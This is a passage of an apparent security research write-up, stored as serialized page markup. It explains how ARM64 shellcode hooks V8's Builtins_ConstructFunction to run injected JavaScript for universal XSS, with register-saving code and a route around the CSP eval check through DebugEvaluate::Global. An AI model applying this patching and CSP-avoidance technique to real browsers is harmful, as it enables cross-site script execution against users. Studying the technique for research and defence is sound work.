shellcode:",{"type":27,"tag":101,"props":8229,"children":8231},{"code":8230,"language":7727,"meta":7,"className":7728,"style":7},"bti c\n\n// store registers that will be overwritten\nstp x15, lr, [sp, #-16]!\n\n// get current rip into x15\nadr x15, .\n\n// load the uxss_sc pointer saved just above new instructions\nldr x15, [x15, #{3 * INSTR_SIZE}]\n\n// jump to uxss_sc\nblr x15\n",[8232],{"type":27,"tag":84,"props":8233,"children":8234},{"__ignoreMap":7},[8235,8243,8250,8258,8266,8273,8281,8289,8296,8304,8312,8319,8327],{"type":27,"tag":207,"props":8236,"children":8237},{"class":209,"line":210},[8238],{"type":27,"tag":207,"props":8239,"children":8240},{},[8241],{"type":33,"value":8242},"bti c\n",{"type":27,"tag":207,"props":8244,"children":8245},{"class":209,"line":244},[8246],{"type":27,"tag":207,"props":8247,"children":8248},{"emptyLinePlaceholder":19},[8249],{"type":33,"value":2062},{"type":27,"tag":207,"props":8251,"children":8252},{"class":209,"line":270},[8253],{"type":27,"tag":207,"props":8254,"children":8255},{},[8256],{"type":33,"value":8257},"// store registers that will be overwritten\n",{"type":27,"tag":207,"props":8259,"children":8260},{"class":209,"line":296},[8261],{"type":27,"tag":207,"props":8262,"children":8263},{},[8264],{"type":33,"value":8265},"stp x15, lr, [sp, #-16]!\n",{"type":27,"tag":207,"props":8267,"children":8268},{"class":209,"line":445},[8269],{"type":27,"tag":207,"props":8270,"children":8271},{"emptyLinePlaceholder":19},[8272],{"type":33,"value":2062},{"type":27,"tag":207,"props":8274,"children":8275},{"class":209,"line":867},[8276],{"type":27,"tag":207,"props":8277,"children":8278},{},[8279],{"type":33,"value":8280},"// get current rip into x15\n",{"type":27,"tag":207,"props":8282,"children":8283},{"class":209,"line":892},[8284],{"type":27,"tag":207,"props":8285,"children":8286},{},[8287],{"type":33,"value":8288},"adr x15, .\n",{"type":27,"tag":207,"props":8290,"children":8291},{"class":209,"line":1475},[8292],{"type":27,"tag":207,"props":8293,"children":8294},{"emptyLinePlaceholder":19},[8295],{"type":33,"value":2062},{"type":27,"tag":207,"props":8297,"children":8298},{"class":209,"line":2065},[8299],{"type":27,"tag":207,"props":8300,"children":8301},{},[8302],{"type":33,"value":8303},"// load the uxss_sc pointer saved just above new instructions\n",{"type":27,"tag":207,"props":8305,"children":8306},{"class":209,"line":2092},[8307],{"type":27,"tag":207,"props":8308,"children":8309},{},[8310],{"type":33,"value":8311},"ldr x15, [x15, #{3 * INSTR_SIZE}]\n",{"type":27,"tag":207,"props":8313,"children":8314},{"class":209,"line":2130},[8315],{"type":27,"tag":207,"props":8316,"children":8317},{"emptyLinePlaceholder":19},[8318],{"type":33,"value":2062},{"type":27,"tag":207,"props":8320,"children":8321},{"class":209,"line":2168},[8322],{"type":27,"tag":207,"props":8323,"children":8324},{},[8325],{"type":33,"value":8326},"// jump to uxss_sc\n",{"type":27,"tag":207,"props":8328,"children":8329},{"class":209,"line":4095},[8330],{"type":27,"tag":207,"props":8331,"children":8332},{},[8333],{"type":33,"value":8334},"blr x15\n",{"type":27,"tag":36,"props":8336,"children":8337},{},[8338,8343,8345,8350],{"type":27,"tag":84,"props":8339,"children":8341},{"className":8340},[],[8342],{"type":33,"value":8225},{"type":33,"value":8344}," is the mmap-ed shellcode invoked by the patched ",{"type":27,"tag":84,"props":8346,"children":8348},{"className":8347},[],[8349],{"type":33,"value":7674},{"type":33,"value":8351}," to execute our XSS payload. Its prologue looks like this:",{"type":27,"tag":101,"props":8353,"children":8355},{"code":8354,"language":7727,"meta":7,"className":7728,"style":7},"bti c\n\n// Save full register context\nstp x0, x1, [sp, #-16]!\nstp x2, x3, [sp, #-16]!\nstp x4, x5, [sp, #-16]!\nstp x6, x7, [sp, #-16]!\nstp x8, x9, [sp, #-16]!\nstp x10, x11, [sp, #-16]!\nstp x12, x13, [sp, #-16]!\nstp x14, x15, [sp, #-16]!\nstp x16, x17, [sp, #-16]!\nstp x18, x19, [sp, #-16]!\nstp x20, x21, [sp, #-16]!\nstp x22, x23, [sp, #-16]!\nstp x24, x25, [sp, #-16]!\nstp x26, x27, [sp, #-16]!\nstp x28, x29, [sp, #-16]!\nstr lr, [sp, #-16]!\n",[8356],{"type":27,"tag":84,"props":8357,"children":8358},{"__ignoreMap":7},[8359,8366,8373,8381,8389,8397,8405,8413,8421,8429,8437,8445,8453,8461,8469,8477,8485,8493,8501],{"type":27,"tag":207,"props":8360,"children":8361},{"class":209,"line":210},[8362],{"type":27,"tag":207,"props":8363,"children":8364},{},[8365],{"type":33,"value":8242},{"type":27,"tag":207,"props":8367,"children":8368},{"class":209,"line":244},[8369],{"type":27,"tag":207,"props":8370,"children":8371},{"emptyLinePlaceholder":19},[8372],{"type":33,"value":2062},{"type":27,"tag":207,"props":8374,"children":8375},{"class":209,"line":270},[8376],{"type":27,"tag":207,"props":8377,"children":8378},{},[8379],{"type":33,"value":8380},"// Save full register context\n",{"type":27,"tag":207,"props":8382,"children":8383},{"class":209,"line":296},[8384],{"type":27,"tag":207,"props":8385,"children":8386},{},[8387],{"type":33,"value":8388},"stp x0, x1, [sp, #-16]!\n",{"type":27,"tag":207,"props":8390,"children":8391},{"class":209,"line":445},[8392],{"type":27,"tag":207,"props":8393,"children":8394},{},[8395],{"type":33,"value":8396},"stp x2, x3, [sp, #-16]!\n",{"type":27,"tag":207,"props":8398,"children":8399},{"class":209,"line":867},[8400],{"type":27,"tag":207,"props":8401,"children":8402},{},[8403],{"type":33,"value":8404},"stp x4, x5, [sp, #-16]!\n",{"type":27,"tag":207,"props":8406,"children":8407},{"class":209,"line":892},[8408],{"type":27,"tag":207,"props":8409,"children":8410},{},[8411],{"type":33,"value":8412},"stp x6, x7, [sp, #-16]!\n",{"type":27,"tag":207,"props":8414,"children":8415},{"class":209,"line":1475},[8416],{"type":27,"tag":207,"props":8417,"children":8418},{},[8419],{"type":33,"value":8420},"stp x8, x9, [sp, #-16]!\n",{"type":27,"tag":207,"props":8422,"children":8423},{"class":209,"line":2065},[8424],{"type":27,"tag":207,"props":8425,"children":8426},{},[8427],{"type":33,"value":8428},"stp x10, x11, [sp, #-16]!\n",{"type":27,"tag":207,"props":8430,"children":8431},{"class":209,"line":2092},[8432],{"type":27,"tag":207,"props":8433,"children":8434},{},[8435],{"type":33,"value":8436},"stp x12, x13, [sp, #-16]!\n",{"type":27,"tag":207,"props":8438,"children":8439},{"class":209,"line":2130},[8440],{"type":27,"tag":207,"props":8441,"children":8442},{},[8443],{"type":33,"value":8444},"stp x14, x15, [sp, #-16]!\n",{"type":27,"tag":207,"props":8446,"children":8447},{"class":209,"line":2168},[8448],{"type":27,"tag":207,"props":8449,"children":8450},{},[8451],{"type":33,"value":8452},"stp x16, x17, [sp, #-16]!\n",{"type":27,"tag":207,"props":8454,"children":8455},{"class":209,"line":4095},[8456],{"type":27,"tag":207,"props":8457,"children":8458},{},[8459],{"type":33,"value":8460},"stp x18, x19, [sp, #-16]!\n",{"type":27,"tag":207,"props":8462,"children":8463},{"class":209,"line":4103},[8464],{"type":27,"tag":207,"props":8465,"children":8466},{},[8467],{"type":33,"value":8468},"stp x20, x21, [sp, #-16]!\n",{"type":27,"tag":207,"props":8470,"children":8471},{"class":209,"line":4154},[8472],{"type":27,"tag":207,"props":8473,"children":8474},{},[8475],{"type":33,"value":8476},"stp x22, x23, [sp, #-16]!\n",{"type":27,"tag":207,"props":8478,"children":8479},{"class":209,"line":4203},[8480],{"type":27,"tag":207,"props":8481,"children":8482},{},[8483],{"type":33,"value":8484},"stp x24, x25, [sp, #-16]!\n",{"type":27,"tag":207,"props":8486,"children":8487},{"class":209,"line":4249},[8488],{"type":27,"tag":207,"props":8489,"children":8490},{},[8491],{"type":33,"value":8492},"stp x26, x27, [sp, #-16]!\n",{"type":27,"tag":207,"props":8494,"children":8495},{"class":209,"line":4290},[8496],{"type":27,"tag":207,"props":8497,"children":8498},{},[8499],{"type":33,"value":8500},"stp x28, x29, [sp, #-16]!\n",{"type":27,"tag":207,"props":8502,"children":8503},{"class":209,"line":4304},[8504],{"type":27,"tag":207,"props":8505,"children":8506},{},[8507],{"type":33,"value":8508},"str lr, [sp, #-16]!\n",{"type":27,"tag":36,"props":8510,"children":8511},{},[8512],{"type":33,"value":8513},"All registers are saved to the stack because we don't know which registers may be clobbered by functions invoked later.",{"type":27,"tag":36,"props":8515,"children":8516},{},[8517,8519,8524],{"type":33,"value":8518},"The epilogue restores all saved registers, restores the original instructions in ",{"type":27,"tag":84,"props":8520,"children":8522},{"className":8521},[],[8523],{"type":33,"value":7674},{"type":33,"value":8525},", and then returns execution to its beginning:",{"type":27,"tag":101,"props":8527,"children":8529},{"code":8528,"language":7727,"meta":7,"className":7728,"style":7},"// restore original instructions of Builtins_ConstructFunction\nldr lr, [sp], #16\n// move lr to the beginning of Builtins_ConstructFunction\nsub lr, lr, #{5 * INSTR_SIZE}\n{write_sc(orig_compile_instrs, \"lr\")}\n\n// wipe from cache\nmov x0, lr\n{WIPE_CACHE}\n\n// restore original registers\nldp x28, x29, [sp], #16\nldp x26, x27, [sp], #16\nldp x24, x25, [sp], #16\nldp x22, x23, [sp], #16\nldp x20, x21, [sp], #16\nldp x18, x19, [sp], #16\nldp x16, x17, [sp], #16\nldp x14, x15, [sp], #16\nldp x12, x13, [sp], #16\nldp x10, x11, [sp], #16\nldp x8, x9, [sp], #16\nldp x6, x7, [sp], #16\nldp x4, x5, [sp], #16\nldp x2, x3, [sp], #16\nldp x0, x1, [sp], #16\n\n// Builtins_ConstructFunction doesnt care about x4 and overwrites\n// it immediately, so we can clobber and use it as a return register.\n// This is done so lr isnt clobbered and ConstructFunction knows\n// where to return\nmov x4, lr\n\n// x15 and lr were saved in patched Builtins_ConstructFunction\nldp x15, lr, [sp], #16\n\nret x4\n",[8530],{"type":27,"tag":84,"props":8531,"children":8532},{"__ignoreMap":7},[8533,8541,8549,8557,8565,8573,8580,8587,8595,8602,8609,8617,8625,8633,8641,8649,8657,8665,8673,8681,8689,8697,8705,8713,8721,8729,8737,8744,8752,8760,8768,8776,8784,8791,8799,8807,8814],{"type":27,"tag":207,"props":8534,"children":8535},{"class":209,"line":210},[8536],{"type":27,"tag":207,"props":8537,"children":8538},{},[8539],{"type":33,"value":8540},"// restore original instructions of Builtins_ConstructFunction\n",{"type":27,"tag":207,"props":8542,"children":8543},{"class":209,"line":244},[8544],{"type":27,"tag":207,"props":8545,"children":8546},{},[8547],{"type":33,"value":8548},"ldr lr, [sp], #16\n",{"type":27,"tag":207,"props":8550,"children":8551},{"class":209,"line":270},[8552],{"type":27,"tag":207,"props":8553,"children":8554},{},[8555],{"type":33,"value":8556},"// move lr to the beginning of Builtins_ConstructFunction\n",{"type":27,"tag":207,"props":8558,"children":8559},{"class":209,"line":296},[8560],{"type":27,"tag":207,"props":8561,"children":8562},{},[8563],{"type":33,"value":8564},"sub lr, lr, #{5 * INSTR_SIZE}\n",{"type":27,"tag":207,"props":8566,"children":8567},{"class":209,"line":445},[8568],{"type":27,"tag":207,"props":8569,"children":8570},{},[8571],{"type":33,"value":8572},"{write_sc(orig_compile_instrs, \"lr\")}\n",{"type":27,"tag":207,"props":8574,"children":8575},{"class":209,"line":867},[8576],{"type":27,"tag":207,"props":8577,"children":8578},{"emptyLinePlaceholder":19},[8579],{"type":33,"value":2062},{"type":27,"tag":207,"props":8581,"children":8582},{"class":209,"line":892},[8583],{"type":27,"tag":207,"props":8584,"children":8585},{},[8586],{"type":33,"value":8104},{"type":27,"tag":207,"props":8588,"children":8589},{"class":209,"line":1475},[8590],{"type":27,"tag":207,"props":8591,"children":8592},{},[8593],{"type":33,"value":8594},"mov x0, lr\n",{"type":27,"tag":207,"props":8596,"children":8597},{"class":209,"line":2065},[8598],{"type":27,"tag":207,"props":8599,"children":8600},{},[8601],{"type":33,"value":8122},{"type":27,"tag":207,"props":8603,"children":8604},{"class":209,"line":2092},[8605],{"type":27,"tag":207,"props":8606,"children":8607},{"emptyLinePlaceholder":19},[8608],{"type":33,"value":2062},{"type":27,"tag":207,"props":8610,"children":8611},{"class":209,"line":2130},[8612],{"type":27,"tag":207,"props":8613,"children":8614},{},[8615],{"type":33,"value":8616},"// restore original registers\n",{"type":27,"tag":207,"props":8618,"children":8619},{"class":209,"line":2168},[8620],{"type":27,"tag":207,"props":8621,"children":8622},{},[8623],{"type":33,"value":8624},"ldp x28, x29, [sp], #16\n",{"type":27,"tag":207,"props":8626,"children":8627},{"class":209,"line":4095},[8628],{"type":27,"tag":207,"props":8629,"children":8630},{},[8631],{"type":33,"value":8632},"ldp x26, x27, [sp], #16\n",{"type":27,"tag":207,"props":8634,"children":8635},{"class":209,"line":4103},[8636],{"type":27,"tag":207,"props":8637,"children":8638},{},[8639],{"type":33,"value":8640},"ldp x24, x25, [sp], #16\n",{"type":27,"tag":207,"props":8642,"children":8643},{"class":209,"line":4154},[8644],{"type":27,"tag":207,"props":8645,"children":8646},{},[8647],{"type":33,"value":8648},"ldp x22, x23, [sp], #16\n",{"type":27,"tag":207,"props":8650,"children":8651},{"class":209,"line":4203},[8652],{"type":27,"tag":207,"props":8653,"children":8654},{},[8655],{"type":33,"value":8656},"ldp x20, x21, [sp], #16\n",{"type":27,"tag":207,"props":8658,"children":8659},{"class":209,"line":4249},[8660],{"type":27,"tag":207,"props":8661,"children":8662},{},[8663],{"type":33,"value":8664},"ldp x18, x19, [sp], #16\n",{"type":27,"tag":207,"props":8666,"children":8667},{"class":209,"line":4290},[8668],{"type":27,"tag":207,"props":8669,"children":8670},{},[8671],{"type":33,"value":8672},"ldp x16, x17, [sp], #16\n",{"type":27,"tag":207,"props":8674,"children":8675},{"class":209,"line":4304},[8676],{"type":27,"tag":207,"props":8677,"children":8678},{},[8679],{"type":33,"value":8680},"ldp x14, x15, [sp], #16\n",{"type":27,"tag":207,"props":8682,"children":8683},{"class":209,"line":5466},[8684],{"type":27,"tag":207,"props":8685,"children":8686},{},[8687],{"type":33,"value":8688},"ldp x12, x13, [sp], #16\n",{"type":27,"tag":207,"props":8690,"children":8691},{"class":209,"line":5530},[8692],{"type":27,"tag":207,"props":8693,"children":8694},{},[8695],{"type":33,"value":8696},"ldp x10, x11, [sp], #16\n",{"type":27,"tag":207,"props":8698,"children":8699},{"class":209,"line":7900},[8700],{"type":27,"tag":207,"props":8701,"children":8702},{},[8703],{"type":33,"value":8704},"ldp x8, x9, [sp], #16\n",{"type":27,"tag":207,"props":8706,"children":8707},{"class":209,"line":7909},[8708],{"type":27,"tag":207,"props":8709,"children":8710},{},[8711],{"type":33,"value":8712},"ldp x6, x7, [sp], #16\n",{"type":27,"tag":207,"props":8714,"children":8715},{"class":209,"line":7917},[8716],{"type":27,"tag":207,"props":8717,"children":8718},{},[8719],{"type":33,"value":8720},"ldp x4, x5, [sp], #16\n",{"type":27,"tag":207,"props":8722,"children":8723},{"class":209,"line":7926},[8724],{"type":27,"tag":207,"props":8725,"children":8726},{},[8727],{"type":33,"value":8728},"ldp x2, x3, [sp], #16\n",{"type":27,"tag":207,"props":8730,"children":8731},{"class":209,"line":7934},[8732],{"type":27,"tag":207,"props":8733,"children":8734},{},[8735],{"type":33,"value":8736},"ldp x0, x1, [sp], #16\n",{"type":27,"tag":207,"props":8738,"children":8739},{"class":209,"line":7943},[8740],{"type":27,"tag":207,"props":8741,"children":8742},{"emptyLinePlaceholder":19},[8743],{"type":33,"value":2062},{"type":27,"tag":207,"props":8745,"children":8746},{"class":209,"line":7952},[8747],{"type":27,"tag":207,"props":8748,"children":8749},{},[8750],{"type":33,"value":8751},"// Builtins_ConstructFunction doesnt care about x4 and overwrites\n",{"type":27,"tag":207,"props":8753,"children":8754},{"class":209,"line":7961},[8755],{"type":27,"tag":207,"props":8756,"children":8757},{},[8758],{"type":33,"value":8759},"// it immediately, so we can clobber and use it as a return register.\n",{"type":27,"tag":207,"props":8761,"children":8762},{"class":209,"line":7969},[8763],{"type":27,"tag":207,"props":8764,"children":8765},{},[8766],{"type":33,"value":8767},"// This is done so lr isnt clobbered and ConstructFunction knows\n",{"type":27,"tag":207,"props":8769,"children":8770},{"class":209,"line":7978},[8771],{"type":27,"tag":207,"props":8772,"children":8773},{},[8774],{"type":33,"value":8775},"// where to return\n",{"type":27,"tag":207,"props":8777,"children":8778},{"class":209,"line":7987},[8779],{"type":27,"tag":207,"props":8780,"children":8781},{},[8782],{"type":33,"value":8783},"mov x4, lr\n",{"type":27,"tag":207,"props":8785,"children":8786},{"class":209,"line":7996},[8787],{"type":27,"tag":207,"props":8788,"children":8789},{"emptyLinePlaceholder":19},[8790],{"type":33,"value":2062},{"type":27,"tag":207,"props":8792,"children":8793},{"class":209,"line":8005},[8794],{"type":27,"tag":207,"props":8795,"children":8796},{},[8797],{"type":33,"value":8798},"// x15 and lr were saved in patched Builtins_ConstructFunction\n",{"type":27,"tag":207,"props":8800,"children":8801},{"class":209,"line":8013},[8802],{"type":27,"tag":207,"props":8803,"children":8804},{},[8805],{"type":33,"value":8806},"ldp x15, lr, [sp], #16\n",{"type":27,"tag":207,"props":8808,"children":8809},{"class":209,"line":8021},[8810],{"type":27,"tag":207,"props":8811,"children":8812},{"emptyLinePlaceholder":19},[8813],{"type":33,"value":2062},{"type":27,"tag":207,"props":8815,"children":8816},{"class":209,"line":8029},[8817],{"type":27,"tag":207,"props":8818,"children":8819},{},[8820],{"type":33,"value":8821},"ret x4\n",{"type":27,"tag":36,"props":8823,"children":8824},{},[8825,8827,8832,8834,8839,8841,8847],{"type":33,"value":8826},"At this point, we have successfully hooked ",{"type":27,"tag":84,"props":8828,"children":8830},{"className":8829},[],[8831],{"type":33,"value":7674},{"type":33,"value":8833}," and can execute arbitrary shellcode whenever it is invoked from within the ",{"type":27,"tag":84,"props":8835,"children":8837},{"className":8836},[],[8838],{"type":33,"value":8225},{"type":33,"value":8840}," body. For our purposes, we want to evaluate an arbitrary JavaScript string to achieve UXSS, and the first function we examined for this was ",{"type":27,"tag":84,"props":8842,"children":8844},{"className":8843},[],[8845],{"type":33,"value":8846},"Builtins_GlobalEval",{"type":33,"value":1041},{"type":27,"tag":36,"props":8849,"children":8850},{},[8851,8856,8858,8864,8866,8872],{"type":27,"tag":84,"props":8852,"children":8854},{"className":8853},[],[8855],{"type":33,"value":8846},{"type":33,"value":8857}," takes a single ",{"type":27,"tag":84,"props":8859,"children":8861},{"className":8860},[],[8862],{"type":33,"value":8863},"String",{"type":33,"value":8865}," argument that it evaluates. However, it comes with some complications. One notable issue is that it checks whether the Content Security Policy (CSP) allows the use of ",{"type":27,"tag":84,"props":8867,"children":8869},{"className":8868},[],[8870],{"type":33,"value":8871},"eval",{"type":33,"value":736},{"type":27,"tag":101,"props":8874,"children":8878},{"code":8875,"language":8876,"meta":7,"className":8877,"style":7},"BUILTIN(GlobalEval) {\n [...]\n\n if (!Builtins::AllowDynamicFunction(isolate, target, target_global_proxy)) {\n isolate->CountUsage(v8::Isolate::kFunctionConstructorReturnedUndefined);\n return ReadOnlyRoots(isolate).undefined_value();\n }\n","cpp","language-cpp shiki shiki-themes slack-dark",[8879],{"type":27,"tag":84,"props":8880,"children":8881},{"__ignoreMap":7},[8882,8895,8903,8910,8956,8979,9006],{"type":27,"tag":207,"props":8883,"children":8884},{"class":209,"line":210},[8885,8890],{"type":27,"tag":207,"props":8886,"children":8887},{"style":1335},[8888],{"type":33,"value":8889},"BUILTIN",{"type":27,"tag":207,"props":8891,"children":8892},{"style":238},[8893],{"type":33,"value":8894},"(GlobalEval) {\n",{"type":27,"tag":207,"props":8896,"children":8897},{"class":209,"line":244},[8898],{"type":27,"tag":207,"props":8899,"children":8900},{"style":238},[8901],{"type":33,"value":8902}," [...]\n",{"type":27,"tag":207,"props":8904,"children":8905},{"class":209,"line":270},[8906],{"type":27,"tag":207,"props":8907,"children":8908},{"emptyLinePlaceholder":19},[8909],{"type":33,"value":2062},{"type":27,"tag":207,"props":8911,"children":8912},{"class":209,"line":296},[8913,8918,8924,8928,8933,8937,8942,8946,8951],{"type":27,"tag":207,"props":8914,"children":8915},{"style":238},[8916],{"type":33,"value":8917}," if (!Builtins::",{"type":27,"tag":207,"props":8919,"children":8921},{"style":8920},"--shiki-default:#4EC9B0",[8922],{"type":33,"value":8923},"AllowDynamicFunction",{"type":27,"tag":207,"props":8925,"children":8926},{"style":238},[8927],{"type":33,"value":1343},{"type":27,"tag":207,"props":8929,"children":8930},{"style":8920},[8931],{"type":33,"value":8932},"isolate",{"type":27,"tag":207,"props":8934,"children":8935},{"style":238},[8936],{"type":33,"value":1123},{"type":27,"tag":207,"props":8938,"children":8939},{"style":8920},[8940],{"type":33,"value":8941},"target",{"type":27,"tag":207,"props":8943,"children":8944},{"style":238},[8945],{"type":33,"value":1123},{"type":27,"tag":207,"props":8947,"children":8948},{"style":8920},[8949],{"type":33,"value":8950},"target_global_proxy",{"type":27,"tag":207,"props":8952,"children":8953},{"style":238},[8954],{"type":33,"value":8955},")) {\n",{"type":27,"tag":207,"props":8957,"children":8958},{"class":209,"line":445},[8959,8964,8969,8974],{"type":27,"tag":207,"props":8960,"children":8961},{"style":220},[8962],{"type":33,"value":8963}," isolate",{"type":27,"tag":207,"props":8965,"children":8966},{"style":238},[8967],{"type":33,"value":8968},"->",{"type":27,"tag":207,"props":8970,"children":8971},{"style":1335},[8972],{"type":33,"value":8973},"CountUsage",{"type":27,"tag":207,"props":8975,"children":8976},{"style":238},[8977],{"type":33,"value":8978},"(v8::Isolate::kFunctionConstructorReturnedUndefined);\n",{"type":27,"tag":207,"props":8980,"children":8981},{"class":209,"line":867},[8982,8987,8992,8997,9002],{"type":27,"tag":207,"props":8983,"children":8984},{"style":376},[8985],{"type":33,"value":8986}," return",{"type":27,"tag":207,"props":8988,"children":8989},{"style":1335},[8990],{"type":33,"value":8991}," ReadOnlyRoots",{"type":27,"tag":207,"props":8993,"children":8994},{"style":238},[8995],{"type":33,"value":8996},"(isolate).",{"type":27,"tag":207,"props":8998,"children":8999},{"style":1335},[9000],{"type":33,"value":9001},"undefined_value",{"type":27,"tag":207,"props":9003,"children":9004},{"style":238},[9005],{"type":33,"value":4301},{"type":27,"tag":207,"props":9007,"children":9008},{"class":209,"line":892},[9009],{"type":27,"tag":207,"props":9010,"children":9011},{"style":238},[9012],{"type":33,"value":5312},{"type":27,"tag":36,"props":9014,"children":9015},{},[9016,9018,9024],{"type":33,"value":9017},"This means we would need to patch the function further to ensure it never enters this ",{"type":27,"tag":84,"props":9019,"children":9021},{"className":9020},[],[9022],{"type":33,"value":9023},"if",{"type":33,"value":9025}," block.",{"type":27,"tag":36,"props":9027,"children":9028},{},[9029],{"type":33,"value":9030},"Alternatively, we could replicate the calls made once the security checks pass:",{"type":27,"tag":101,"props":9032,"children":9034},{"code":9033,"language":8876,"meta":7,"className":8877,"style":7},"BUILTIN(GlobalEval) {\n\n [...]\n\n DirectHandle\u003CJSFunction> function;\n ASSIGN_RETURN_FAILURE_ON_EXCEPTION(\n isolate, function,\n Compiler::GetFunctionFromValidatedString(\n direct_handle(target->native_context(), isolate), source,\n NO_PARSE_RESTRICTION, kNoSourcePosition));\n RETURN_RESULT_OR_FAILURE(\n isolate, Execution::Call(isolate, function, target_global_proxy, {}));\n",[9035],{"type":27,"tag":84,"props":9036,"children":9037},{"__ignoreMap":7},[9038,9049,9056,9063,9070,9078,9091,9099,9116,9146,9154,9166],{"type":27,"tag":207,"props":9039,"children":9040},{"class":209,"line":210},[9041,9045],{"type":27,"tag":207,"props":9042,"children":9043},{"style":1335},[9044],{"type":33,"value":8889},{"type":27,"tag":207,"props":9046,"children":9047},{"style":238},[9048],{"type":33,"value":8894},{"type":27,"tag":207,"props":9050,"children":9051},{"class":209,"line":244},[9052],{"type":27,"tag":207,"props":9053,"children":9054},{"emptyLinePlaceholder":19},[9055],{"type":33,"value":2062},{"type":27,"tag":207,"props":9057,"children":9058},{"class":209,"line":270},[9059],{"type":27,"tag":207,"props":9060,"children":9061},{"style":238},[9062],{"type":33,"value":8902},{"type":27,"tag":207,"props":9064,"children":9065},{"class":209,"line":296},[9066],{"type":27,"tag":207,"props":9067,"children":9068},{"emptyLinePlaceholder":19},[9069],{"type":33,"value":2062},{"type":27,"tag":207,"props":9071,"children":9072},{"class":209,"line":445},[9073],{"type":27,"tag":207,"props":9074,"children":9075},{"style":238},[9076],{"type":33,"value":9077}," DirectHandle\u003CJSFunction> function;\n",{"type":27,"tag":207,"props":9079,"children":9080},{"class":209,"line":867},[9081,9086],{"type":27,"tag":207,"props":9082,"children":9083},{"style":1335},[9084],{"type":33,"value":9085}," ASSIGN_RETURN_FAILURE_ON_EXCEPTION",{"type":27,"tag":207,"props":9087,"children":9088},{"style":238},[9089],{"type":33,"value":9090},"(\n",{"type":27,"tag":207,"props":9092,"children":9093},{"class":209,"line":892},[9094],{"type":27,"tag":207,"props":9095,"children":9096},{"style":238},[9097],{"type":33,"value":9098}," isolate, function,\n",{"type":27,"tag":207,"props":9100,"children":9101},{"class":209,"line":1475},[9102,9107,9112],{"type":27,"tag":207,"props":9103,"children":9104},{"style":238},[9105],{"type":33,"value":9106}," Compiler::",{"type":27,"tag":207,"props":9108,"children":9109},{"style":1335},[9110],{"type":33,"value":9111},"GetFunctionFromValidatedString",{"type":27,"tag":207,"props":9113,"children":9114},{"style":238},[9115],{"type":33,"value":9090},{"type":27,"tag":207,"props":9117,"children":9118},{"class":209,"line":2065},[9119,9124,9128,9132,9136,9141],{"type":27,"tag":207,"props":9120,"children":9121},{"style":1335},[9122],{"type":33,"value":9123}," direct_handle",{"type":27,"tag":207,"props":9125,"children":9126},{"style":238},[9127],{"type":33,"value":1343},{"type":27,"tag":207,"props":9129,"children":9130},{"style":220},[9131],{"type":33,"value":8941},{"type":27,"tag":207,"props":9133,"children":9134},{"style":238},[9135],{"type":33,"value":8968},{"type":27,"tag":207,"props":9137,"children":9138},{"style":1335},[9139],{"type":33,"value":9140},"native_context",{"type":27,"tag":207,"props":9142,"children":9143},{"style":238},[9144],{"type":33,"value":9145},"(), isolate), source,\n",{"type":27,"tag":207,"props":9147,"children":9148},{"class":209,"line":2092},[9149],{"type":27,"tag":207,"props":9150,"children":9151},{"style":238},[9152],{"type":33,"value":9153}," NO_PARSE_RESTRICTION, kNoSourcePosition));\n",{"type":27,"tag":207,"props":9155,"children":9156},{"class":209,"line":2130},[9157,9162],{"type":27,"tag":207,"props":9158,"children":9159},{"style":1335},[9160],{"type":33,"value":9161}," RETURN_RESULT_OR_FAILURE",{"type":27,"tag":207,"props":9163,"children":9164},{"style":238},[9165],{"type":33,"value":9090},{"type":27,"tag":207,"props":9167,"children":9168},{"class":209,"line":2168},[9169,9174,9179],{"type":27,"tag":207,"props":9170,"children":9171},{"style":238},[9172],{"type":33,"value":9173}," isolate, Execution::",{"type":27,"tag":207,"props":9175,"children":9176},{"style":1335},[9177],{"type":33,"value":9178},"Call",{"type":27,"tag":207,"props":9180,"children":9181},{"style":238},[9182],{"type":33,"value":9183},"(isolate, function, target_global_proxy, {}));\n",{"type":27,"tag":36,"props":9185,"children":9186},{},[9187,9189,9194,9196,9202,9204,9210,9212,9218],{"type":33,"value":9188},"But determining the correct ",{"type":27,"tag":84,"props":9190,"children":9192},{"className":9191},[],[9193],{"type":33,"value":8941},{"type":33,"value":9195}," value, obtaining ",{"type":27,"tag":84,"props":9197,"children":9199},{"className":9198},[],[9200],{"type":33,"value":9201},"target->native_context()",{"type":33,"value":9203},", and locating the ",{"type":27,"tag":84,"props":9205,"children":9207},{"className":9206},[],[9208],{"type":33,"value":9209},"direct_handle",{"type":33,"value":9211}," function, just to make a proper call to ",{"type":27,"tag":84,"props":9213,"children":9215},{"className":9214},[],[9216],{"type":33,"value":9217},"Compiler::GetFunctionFromValidatedString",{"type":33,"value":9219},", seemed unnecessarily cumbersome.",{"type":27,"tag":36,"props":9221,"children":9222},{},[9223,9225,9231],{"type":33,"value":9224},"Instead, we found a much simpler option with no security checks: ",{"type":27,"tag":84,"props":9226,"children":9228},{"className":9227},[],[9229],{"type":33,"value":9230},"DebugEvaluate::Global",{"type":33,"value":9232},". This function is used by the DevTools console to evaluate JavaScript entered there.",{"type":27,"tag":36,"props":9234,"children":9235},{},[9236],{"type":33,"value":9237},"For our needs, it is straightforward to call:",{"type":27,"tag":101,"props":9239,"children":9241},{"code":9240,"language":8876,"meta":7,"className":8877,"style":7},"MaybeDirectHandle\u003CObject> DebugEvaluate::Global(Isolate* isolate,\n Handle\u003CString> source,\n debug::EvaluateGlobalMode mode,\n REPLMode repl_mode);\n",[9242],{"type":27,"tag":84,"props":9243,"children":9244},{"__ignoreMap":7},[9245,9296,9326,9348],{"type":27,"tag":207,"props":9246,"children":9247},{"class":209,"line":210},[9248,9253,9258,9263,9268,9273,9277,9282,9287,9292],{"type":27,"tag":207,"props":9249,"children":9250},{"style":8920},[9251],{"type":33,"value":9252},"MaybeDirectHandle",{"type":27,"tag":207,"props":9254,"children":9255},{"style":238},[9256],{"type":33,"value":9257},"\u003C",{"type":27,"tag":207,"props":9259,"children":9260},{"style":8920},[9261],{"type":33,"value":9262},"Object",{"type":27,"tag":207,"props":9264,"children":9265},{"style":238},[9266],{"type":33,"value":9267},"> DebugEvaluate::",{"type":27,"tag":207,"props":9269,"children":9270},{"style":1335},[9271],{"type":33,"value":9272},"Global",{"type":27,"tag":207,"props":9274,"children":9275},{"style":238},[9276],{"type":33,"value":1343},{"type":27,"tag":207,"props":9278,"children":9279},{"style":8920},[9280],{"type":33,"value":9281},"Isolate",{"type":27,"tag":207,"props":9283,"children":9284},{"style":214},[9285],{"type":33,"value":9286},"*",{"type":27,"tag":207,"props":9288,"children":9289},{"style":220},[9290],{"type":33,"value":9291}," 